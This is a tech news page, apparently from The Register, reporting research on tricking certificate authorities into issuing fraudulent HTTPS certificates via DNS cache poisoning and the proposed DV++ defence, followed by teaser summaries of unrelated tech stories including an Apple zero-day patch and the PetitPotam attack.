How to nab a HTTPS cert for a stranger's website: Step one, shatter those DNS queries...

Domain validation systems fooled by boffins

Updated Researchers in Germany have discovered how to obtain HTTPS security certificates for web domains they don't own – even if the certs are protected by PKI-based domain validation.

Essentially, some certificate authorities can be tricked into incorrectly issuing the cryptographic certs, meaning a miscreant can get a SSL/TLS certificate for someone else's domain and use it to create a malicious copy of that website. People fooled into connecting to the faked site will be told by their browsers that the connection is secure, when really they're visiting a spoofed version.

Dr Haya Shulman of the Fraunhofer Institute for Secure Information Technology (SIT), and one of the boffins behind told The Register a "weak off-path attacker" can – using nothing more than a laptop – effectively steal credentials, eavesdrop, or distribute malware using the method. The group at this stage withheld the names of the certificate authorities (CAs) that can be tricked into incorrectly issuing cryptographic certs.

In a paper seen by The Register, to be presented at the ACM's Conference on Computer and Communications Security conference in Toronto, Canada, in October, Dr Shulman's team wrote:

The attack exploits DNS cache poisoning and tricks the CA into issuing fraudulent certificates for domains the attacker does not legitimately own – namely certificates binding the attacker's public key to a victim domain.

The group has asked The Register not to republish the paper because it names affected certificate authorities. We have, however, seen a demo of a live attack by Fraunhofer SIT's team. The technique ensures the DNS domain validation checks run by the CA are performed, in part, using the attacker's DNS server rather than a server belonging to the domain's owner. This can be leveraged by the hacker to therefore obtain a cert for that domain.

"The attack is initiated with a DNS request," the paper explained. "To succeed in the attack, the attacker has to craft a correct DNS response before the authentic response from the real nameserver arrives."

The attack depends on getting said DNS responses broken into fragments, and then injecting malicious fragments to fool the CA into handing over the cert to the attacker. The first fragments of the response contain valid DNS challenge-response fields. The inserted fragments can be whatever the miscreant needs to complete the transaction so that he or she gets the cert.

Network admins will have worked out by now that the attacker needs to do some offline research to get this to work – they have to examine responses from the victim's nameserver to calculate "the offset where the fragmentation should occur."

The research team proposed a domain validation protocol they dubbed "DV++" to block the attack. In summary, DV++ uses a distributed model which sends requests to multiple certification agents.

"To pass a DV++ validation, domain owners must prove their ownership to a majority of the agents in a fully automated manner by responding to queries sent by the agents for the resource records in the domain."

Dr Shulman's collaborators in the project are Markus Brandt, Tianxiang Dai, Amit Klein and Michael Waidner. ®

Editor's note: This article was revised after publication to clarify that it is the websites being spoofed, not the certificates. The certs are handed over to the wrong person, in effect, and used to spoof legit sites.

Send us news

Japan plans remote-controlled robotic space tourism to the ISS and beyond

'Avatars' that roam around space station, or do work with high performance hands, to be controllable from the ground

The International Space Station is getting mobile robot “space avatars” controllable by the public from Earth, courtesy of a joint project between the Japan Aerospace Exploration Agency (JAXA) and ANA Holdings’ telepresence start-up avatarin.

The project will create a virtual remote space tourism experience aimed at those who can't afford to hitch a ride with Jeff Bezos or Richard Branson.

JAXA’s press release reads:

Continue reading

SSD belonging to Euro-cloud Scaleway was stolen from back of a truck, then turned up on YouTube

Has since been recovered, and Scaleway now ships disks with GPS trackers

It sounds like a "dog ate my homework" excuse for the cloud age, but Euro-cloud Scaleway says one of its solid-state disks was stolen from a truck, turned up in the hands of a YouTuber, and has now made its way back home.

A Saturday post by CEO Yann Lechelle revealed that over a year ago, a disk was stolen while in transit between two Scaleway data centres.

The disk disappeared, and Scaleway warned clients about the incident.

Continue reading

Private cryptocurrencies make lousy national currencies: International Monetary Fund

But the idea of blockchain-powered money is worth government consideration

The International Monetary Fund has called on nations to consider using blockchain tech to improve financial services, but warned that dabbling with private cryptocurrencies is vastly risky.

A Monday post titled Cryptoassets as National Currency? A Step Too Far opens by stating "New digital forms of money have the potential to provide cheaper and faster payments, enhance financial inclusion, improve resilience and competition among payment providers, and facilitate cross-border transfers."

But the post notes that some nations are considering they could access those benefits with the shortcut of adopting cryptoassets as either legal tender, or even "a second (or potentially only) national currency".

Continue reading

Apple patches zero-day vulnerability in iOS, iPadOS, macOS under active attack

Characteristically mum about details

Apple on Monday patched a zero-day vulnerability in its iOS, iPadOS, and macOS operating systems, only a week after issuing a set of OS updates addressing about three dozen other flaws.

The bug, CVE-2021-30807, was found in the iGiant's IOMobileFrameBuffer code, a kernel extension for managing the screen frame buffer that could be abused to run malicious code on the affected device.

CVE-2021-30807, credited to an anonymous researcher, has been addressed by undisclosed but purportedly improved memory handling code.

Continue reading

Bezos offers to knock $2bn off his bill to NASA to stay in the running for Moon contract

It's not a bribe when it's a payment waiver

Blue Origins supremo Jeff Bezos has offered NASA a $2bn discount to keep his dream alive of transporting the next American man and first woman to the Moon's surface.

Earlier this year, the contract for the Human Landing System (HLS), the craft that will put a crew on the Moon as part of NASA’s lunar Artemis program, was solely awarded to SpaceX. Blue Origin and Dynetics complained to the US Government Accountability Office (GAO) that this was unfair: in their mind, NASA was reneging on a promise to keep the process of selecting a lander competitive by just defaulting to SpaceX.

NASA later retracted its decision to side just with Elon Musk's SpaceX. Blue Origin essentially wants to stay in the race to produce a lander for the Moon mission, and has made a bunch of offers to NASA to make that happen.

Continue reading

Dell won't ship energy-hungry PCs to California and five other US states due to power regulations

Energy efficiency rules appears to be limiting the availability of gaming rigs

Dell is no longer shipping energy-hungry gaming PCs to certain states in America because they demand more energy than local standards allow.

Customers seeking to purchase, for example, an Alienware Aurora Ryzen Edition R10 Gaming Desktop from Dell's website and have it shipped to California are now presented with a message that tells buyers they're out of luck.

"This product cannot be shipped to the states of California, Colorado, Hawaii, Oregon, Vermont or Washington due to power consumption regulations adopted by those states," the website says. "Any orders placed that are bound for those states will be canceled."

Continue reading

You, too, can be a Windows domain controller and do whatever you like, with this one weird WONTFIX trick

Microsoft offers some mitigations for thwarting PetitPotam attacks

Microsoft completed a vulnerability hat-trick this month as yet another security weakness was uncovered in its operating systems. And this one doesn't even need authentication to work its magic.

The security shortcoming can be exploited using the wonderfully named PetitPotam technique. It involves abusing Redmond's MS-EFSRPC (Encrypting File System Remote Protocol) to take over a corporate Windows network. It seems ideal for penetration testers, and miscreants who have gained a foothold in a Windows network.

Specifically, security researcher Gilles Lionel found it was possible to use MS-EFSRPC to force a device, including Windows domain controllers, to authenticate with a remote attacker-controlled NTLM relay. The end result is an authentication certificate that grants the attacker domain-controller-level access to services, allowing them to commandeer the entire domain.

Continue reading

Google updates timeline for unpopular Privacy Sandbox, which will kill third-party cookies in Chrome by 2023

'The W3C doesn't get to be the boss of anyone, the decisions are going to be made at each of the browsers'

Google has updated the schedule for its introduction of "Privacy Sandbox" browser technology and the phasing out of third-party cookies.

The new timeline has split the bundle of technologies in the Privacy Sandbox into five phases: discussion, testing, implementation in Chrome (called "Ready for adoption"), Transition State 1 during which Chrome will "monitor adoption and feedback" and then the next stage that involves winding down support for third-party cookies over a three-month period finishing "late 2023."

Although "late 2023" might sound a long way off, the timeline has revealed that "discussion" of the contentious FLoC (Federated Learning of Cohorts) is planned to end in Q3 2021 – just a couple of months away – and that discussion for First Party Sets, rejected by the W3C Technical Architecture Group as " harmful to the web in its current form," is scheduled to end around mid-November.

Continue reading

Remember the bloke who was told by Zen Internet to contact his MP about crap service? Yeah, it's still not fixed

Fear not! Issue is at the 'highest level of escalation,' says ISP

A broadband customer from Leatherhead, Surrey, who was told to "speak to your MP" after his ISP failed to resolve repeated line disconnections has now been informed he can leave his contract without penalty after Openreach failed to resolve the problem.

Alan Brown, a network manager at a Russell Group University, got in touch with us in February exasperated at the poor service he was experiencing and the contradictory information he'd received from his ISP, Rochdale-based Zen Internet, and Openreach engineers.

On one day alone he told us he'd experienced no fewer than 28 breaks in service.

Continue reading

South Korea reports export boom in silicon, wireless comms, and instant noodles

Makes sense really

Newly released data suggests South Korea is having a silicon and instant noodle renaissance, both thanks to COVID-19.

The south side of the nation had a great month for exports as the daily average for the first 20 days of July grew by 32.8 percent year-on-year. Data released by the Korea Customs Service detailed a year-on-year increase in semiconductors by 33.9 per cent, wireless communication by 68.1 per cent, and industrial precision equipment by 15.1 per cent. Meanwhile, figures decreased for computer peripheral equipment by 7.8 per cent.

The increases are welcome news to many given the pandemic-related supply issues seen globally last year and this, specifically those in the semiconductor industry.

Continue reading

Brit reseller given 2022 court date for £270m Microsoft SaaS licence sueball's first hearing

End of March for ValueLicensing's jurisdictional defence

British software licence reseller ValueLicensing has a trial date for the first part of a £270m legal showdown against Microsoft after accusing the US behemoth of breaking UK and EU competition laws.

A High Court hearing of Microsoft's attempt to strike out ValueLicensing's case will take place on 30-31 March 2022, the British company announced in a statement today.

Jon Horley, founder and MD of ValueLicensing, said: "This High Court claim covers the damage to our business through Microsoft's abuse of its dominant market position, effectively destroying the pre-owned software market for desktop products. We are not the only victim to have suffered loss as a result of Microsoft's anticompetitive activity since 2016."

Continue reading